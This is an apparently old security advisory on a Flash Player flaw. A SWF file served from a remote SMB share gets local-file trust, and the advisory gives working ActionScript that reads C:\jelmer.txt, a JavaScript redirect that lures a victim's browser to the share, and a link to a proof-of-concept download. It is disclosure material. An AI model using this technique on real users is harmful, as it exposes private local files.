COMMAND

	Flash player can read local files

SYSTEMS AFFECTED

	All ?

PROBLEM

	jelmer [jkuperus@xs1.xs4all.nl] found :
	

	The flaw lies in the fact that when a  flash  movie  is  loaded  from  a
	remote smb share it is treated as though it was loaded  from  the  users
	harddisk. Allowing the following action script code to work
	 

	urlXML = new XML();

	urlXML.onLoad = readXML;

	myField = "Loading data...";

	urlXML.load("file:///C:/jelmer.txt");

	

	function readXML() {

	 myField = urlXML.toString();

	}

	

	It uses the flash's xml control to read and display the contents of
	 

	c:\jelmer.txt

	

	In order for it to work one has to  get  a  user  to  view  a  specially
	crafted webpage wich could look like this
	 

	<script language="javascript">

	 document.location.href='\\\\HOST_IP\\exploit\\read.swf';

	</script>

	

	It points the browser to the swf on the smb share so  that  it  displays
	it
	

	 Demonstration

	 =============

	

	Download the following file and extract the contained swf  to  a  remote
	share, start it from there ( for instance by dragging it from the  share
	into explorer or creating a html file as described above)
	 

	http://www.xs4all.nl/~jkuperus/exploit.zip

	

	It will read and display the contents of c:\jelmer.txt

SOLUTION

	?